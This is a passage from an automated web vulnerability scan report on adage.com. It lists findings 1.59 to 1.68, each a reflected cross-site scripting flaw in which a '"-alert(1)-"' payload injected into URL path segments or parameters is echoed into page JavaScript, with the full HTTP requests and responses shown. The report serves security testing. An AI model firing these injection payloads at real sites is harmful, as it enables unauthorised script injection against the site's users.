hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.59. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/xing.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96793"-alert(1)-"a394d944e1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons96793"-alert(1)-"a394d944e1f/xing.png?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=88C3436AA4114F78F4C5848CCBBD40D55CF5B948; path=/
Set-Cookie: HMAC=4579CE5B53DD0BC26FEFF0A700A2B8993D76EBCC; path=/
Set-Cookie: HMAC=7DB04CBF69DC08A8A934F23D68C5FC92B6EFFECC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons96793"-alert(1)-"a394d944e1f/xing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="
...[SNIP]...

1.60. http://adage.com//images/save-and-share-icons/xing.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/xing.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fd01"-alert(1)-"cbc44a735e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images/save-and-share-icons/xing.png8fd01"-alert(1)-"cbc44a735e8?1298427936 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B6D4AD9A93DD035B602CC2AAD35721A5D135A0AC; path=/
Set-Cookie: HMAC=C7FA34232180485A1A3536DC983C318C11E7BB5F; path=/
Set-Cookie: HMAC=6D494A9DD9C0B1D9A903518AE0B52F0D5BB33674; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298427936";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com//images/save-and-share-icons/xing.png8fd01"-alert(1)-"cbc44a735e8"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.61. http://adage.com/ajax/get_comments.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /ajax/get_comments.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7b7"-alert(1)-"366d2d0d6da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax7b7b7"-alert(1)-"366d2d0d6da/get_comments.php?article_id=229525 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F; __utma=1.1885314013.1314893339.1314893339.1314893339.1; __utmb=1.1.10.1314893339; __utmc=1; __utmz=1.1314893339.1.1.utmcsr=doubleverify.com|utmccn=(referral)|utmcmd=referral|utmcct=/resources/; OAX=Mhd7ak5frfsAAc+6; __qca=P0-1500348259-1314893346693; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:13:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BB107E0DFD6B2FCAAFF77CA2A6ABC129175B5314; path=/
Set-Cookie: HMAC=A0BB7E95CF689FDEBDA1AE88A0581BAA70C4945B; path=/
Set-Cookie: HMAC=2B11B5F0414833ADBAA5580B5C5A9B65E6AC1839; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49464
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
BX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?article_id=229525";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/ajax7b7b7"-alert(1)-"366d2d0d6da/get_comments.php"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
h
...[SNIP]...

1.62. http://adage.com/ajax/get_comments.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /ajax/get_comments.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3cb7"-alert(1)-"a81db8a7c00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/get_comments.phpc3cb7"-alert(1)-"a81db8a7c00?article_id=229525 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F; __utma=1.1885314013.1314893339.1314893339.1314893339.1; __utmb=1.1.10.1314893339; __utmc=1; __utmz=1.1314893339.1.1.utmcsr=doubleverify.com|utmccn=(referral)|utmcmd=referral|utmcct=/resources/; OAX=Mhd7ak5frfsAAc+6; __qca=P0-1500348259-1314893346693; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:13:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=304BD4F634CE9AF2384D98A1138DBF81800DFC6B; path=/
Set-Cookie: HMAC=94EA98DD4E26275F970A1FE4B54F876C11313528; path=/
Set-Cookie: HMAC=CC55A4626E8FC88BE0ED3B950F8912B5E91416A9; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49464
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?article_id=229525";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/ajax/get_comments.phpc3cb7"-alert(1)-"a81db8a7c00"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.63. http://adage.com/ajax/get_comments.php [article_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /ajax/get_comments.php

Issue detail

The value of the article_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a47d"-alert(1)-"9cc0d874d9c was submitted in the article_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/get_comments.php?article_id=2295253a47d"-alert(1)-"9cc0d874d9c HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F; __utma=1.1885314013.1314893339.1314893339.1314893339.1; __utmb=1.1.10.1314893339; __utmc=1; __utmz=1.1314893339.1.1.utmcsr=doubleverify.com|utmccn=(referral)|utmcmd=referral|utmcct=/resources/; OAX=Mhd7ak5frfsAAc+6; __qca=P0-1500348259-1314893346693; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:13:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=7E7E9530B5C27ED13881E2AA999737911B93655D; path=/
Set-Cookie: HMAC=7227FF5351EA8EBAC804BEF24DD5263F89826A90; path=/
Status: 404 Not Found
Set-Cookie: HMAC=DB40930A67A6143B254ADA97A1CEFB425F014C46; path=/
Set-Cookie: HMAC=CE1E489F0E677A97D8AC837AA4DEC2ACDAB55CE4; path=/
Set-Cookie: HMAC=75007C044C1285A992DF7FF2088B18B0ED2A2D0A; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49520
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
_N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "get_comments.php?article_id=2295253a47d"-alert(1)-"9cc0d874d9c";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/ajax/get_comments.php"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
/
...[SNIP]...

1.64. http://adage.com/ajax/get_comments.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /ajax/get_comments.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef573"-alert(1)-"863d9e39407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/get_comments.php?article_id=22/ef573"-alert(1)-"863d9e394079525 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F; __utma=1.1885314013.1314893339.1314893339.1314893339.1; __utmb=1.1.10.1314893339; __utmc=1; __utmz=1.1314893339.1.1.utmcsr=doubleverify.com|utmccn=(referral)|utmcmd=referral|utmcct=/resources/; OAX=Mhd7ak5frfsAAc+6; __qca=P0-1500348259-1314893346693; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:13:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=58F2E1760667878ECD581F800051DC1F4DB2D418; path=/
Set-Cookie: HMAC=D6610672B12C2B84C8B40A39DF04E56D5D57E92A; path=/
Status: 404 Not Found
Set-Cookie: HMAC=C7B416C3F6F8061C9C2AD4D539050C3783559DF6; path=/
Set-Cookie: HMAC=0B8A78F1E6E9CAB03F7B5ADEF802CE221568DD02; path=/
Set-Cookie: HMAC=C07B300DD4654C0CFA1B9E4888506E39C4A45316; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49522
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "get_comments.php?article_id=22/ef573"-alert(1)-"863d9e394079525";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/ajax/get_comments.php"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABL
...[SNIP]...

1.65. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /article/digital/doubleverify-33m-funding/229525/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8361"-alert(1)-"1042b2e5d11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articled8361"-alert(1)-"1042b2e5d11/digital/doubleverify-33m-funding/229525/ HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=246A895C47849821EC02CF4535AABA5189357C05; path=/
Set-Cookie: HMAC=70CAE80D425C4AB11DA485022461B5A95CB52E29; path=/
Set-Cookie: HMAC=1960647E49A528B8AA188F278C52BF9468ABCE38; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49473
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/articled8361"-alert(1)-"1042b2e5d11/digital/doubleverify-33m-funding/229525/"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none"
...[SNIP]...

1.66. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /article/digital/doubleverify-33m-funding/229525/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddfeb"-alert(1)-"304ed33505d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/digital/doubleverify-33m-funding/229525ddfeb"-alert(1)-"304ed33505d/ HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=A2F56F5F2831ACC16480AF1DBA36267B959EBC63; path=/
Set-Cookie: HMAC=7049C40ECF1B42AD1607002EE31C89516C96EB06; path=/
Status: 404 Not Found
Set-Cookie: HMAC=0CC124562C7BF49FF68C85C0A55413726518CCCF; path=/
Set-Cookie: HMAC=BE7B4E1DDAE1C079CC834A08774B6EA6E3C276CF; path=/
Set-Cookie: HMAC=BF27D1FC3AD3A30EA50B13861CC6238F1F3B9520; path=/
Set-Cookie: redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525ddfeb%22-alert%281%29-%22304ed33505d%2F; expires=Fri, 31-Aug-2012 16:12:08 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 49477

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
tbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "article.php";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/article/digital/doubleverify-33m-funding/229525ddfeb"-alert(1)-"304ed33505d/"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.
...[SNIP]...

1.67. http://adage.com/article/digital/doubleverify-33m-funding/229525/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /article/digital/doubleverify-33m-funding/229525/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d08c6"-alert(1)-"fa56ecc0080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/digital/doubleverify-33m-funding/229525/?d08c6"-alert(1)-"fa56ecc0080=1 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://www.doubleverify.com/resources/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 01 Sep 2011 16:10:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=F7373A1FA8FD49A53BBEE4862DC1D5814C38BA36; path=/
Set-Cookie: HMAC=4F37D02818900DD604F64F89B6EFCCA1F19EA15E; path=/
Set-Cookie: redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F%3Fd08c6%22-alert%281%29-%22fa56ecc0080%3D1; expires=Fri, 31-Aug-2012 16:10:21 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 75706

<!DOCTYPE html>

<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">

<head profile="http://a9.com/-/spec/opensearch/1.1/">

<title>DoubleVerify Gets Another $33M in Funding | Digital - A
...[SNIP]...
bEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "article.php?d08c6"-alert(1)-"fa56ecc0080=1";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/article/digital/doubleverify-33m-funding/229525/"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

...[SNIP]...

1.68. http://adage.com/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f52"-alert(1)-"5ae0a33a27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css90f52"-alert(1)-"5ae0a33a27/style.css?1314816038 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=45FDC1F0C5FED5415AA506393E1402B6C52109AD; path=/
Set-Cookie: HMAC=2FE609C1B55537F5E34F11ECACDDB2CD47880965; path=/
Set-Cookie: HMAC=81ABE1FE6ECB7FF525ED70E4DC59E343DF8B95D2; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49448
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
x.vpc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314816038";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/css90f52"-alert(1)-"5ae0a33a27/style.css"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

